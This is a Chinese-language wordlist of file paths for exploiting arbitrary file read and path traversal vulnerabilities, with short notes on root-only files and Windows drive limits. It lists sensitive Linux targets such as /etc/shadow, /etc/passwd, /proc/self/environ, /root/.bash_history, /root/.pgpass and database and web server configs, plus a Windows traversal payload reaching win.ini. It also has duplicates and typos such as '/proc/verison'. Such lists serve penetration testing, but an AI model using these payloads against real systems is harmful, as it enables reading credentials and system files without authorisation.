常用的任意文件读取字典
1.目前收集到的大多数linux的
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version
/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/self/environ
/proc/verison
/proc/cmdline
/proc/self/cwd
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version
/etc/httpd/conf/httpd.conf
/etc/rc.local
/usr/local/apache/conf/httpd.conf
/var/www/html/apache/conf/httpd.conf
/home/httpd/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/etc/apache/httpd.conf
/usr/local/lib/php.ini
/etc/hosts.deny
/etc/bashrc
/etc/group
/etc/httpd/httpd.conf
/etc/issue
/etc/issue/net
/etc/ssh/ssh_config
/etc/termcap
/etc/xinetd.d
/etc/mtab
/etc/vsftpd/vsftpd.conf
/etc/xinetd.conf
/etc/protocols
/etc/logrotate.conf
/etc/ld.so.conf
/etc/wgetrc
/etc/passwd
/etc/shadow
/etc/inputrc
/etc/resolv.conf
/etc/sysconfig/network
/etc/sendmail.cf
/etc/sendmail.cw
/usr/local/app/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf
/usr/local/app/php5/lib/php.ini
/etc/sysconfig/iptables
/etc/rsyncd.conf
/etc/sysconfig/network-scripts/ifcfg-eth0
/etc/redhat-release
/var/spool/cron/crontabs/root
/root/.pgpass
/root/.psql_history
/root/.bash_history
/etc/fstab
/etc/host.conf
/etc/motd
/etc/ld.so.conf
/etc/sysconfig/network-scripts/ifcfg-eth0
/etc/sysconfig/network-scripts/ifcfg-eth1
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/etc/init.d/httpd
/etc/init.d/mysql
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
2.bash_history
其实大多数时候是读取不到的,跟改文件默认的权限设置有关,只能root权限读
/root/.bash_history
3.windows可用于测试的
../../../../../../../../../../windows/win.ini
注:windows与Linux的/根目录结构不同,如果网站是部署在D盘上,那么目录穿越漏洞就只能读取到D盘内的内容,读不到C盘的
如果加班只是玩手机、刷微博,那一定是煎熬。如果是坚持的修炼,那一定收益颇丰。
